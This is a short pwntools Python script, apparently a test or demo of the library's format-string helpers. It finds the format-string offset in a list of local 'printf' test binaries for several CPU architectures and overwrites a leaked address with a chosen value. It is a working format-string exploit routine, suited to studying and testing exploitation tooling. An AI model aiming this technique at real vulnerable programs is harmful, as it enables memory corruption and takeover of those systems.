1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
|
#!/usr/bin/env python
from pwn import *
@context.quiet
def exec_fmt(payload):
p = context.binary.process()
p.sendline(payload)
return p.recvall()
def exploit(binary):
context.binary = ELF(binary)
autofmt = FmtStr(exec_fmt)
offset = autofmt.offset
with context.binary.process() as p:
addr = unpack(p.recv(context.bytes))
payload = fmtstr_payload(offset, {addr: p32(0x1337babe)})
p.sendline(payload)
p.recvuntil(b"DONE")
print(hex(u32(p.recv(4))))
binaries = [
"printf.mips",
"printf.mips64",
"printf.mipsel",
"printf.mips64el",
"printf.native",
"printf.native32",
"printf.ppc",
"printf.ppc64",
"printf.sparc64",
"printf.arm",
"printf.aarch64",
]
if len(sys.argv) > 1:
binaries = sys.argv[1:]
for binary in binaries:
exploit(binary)
|
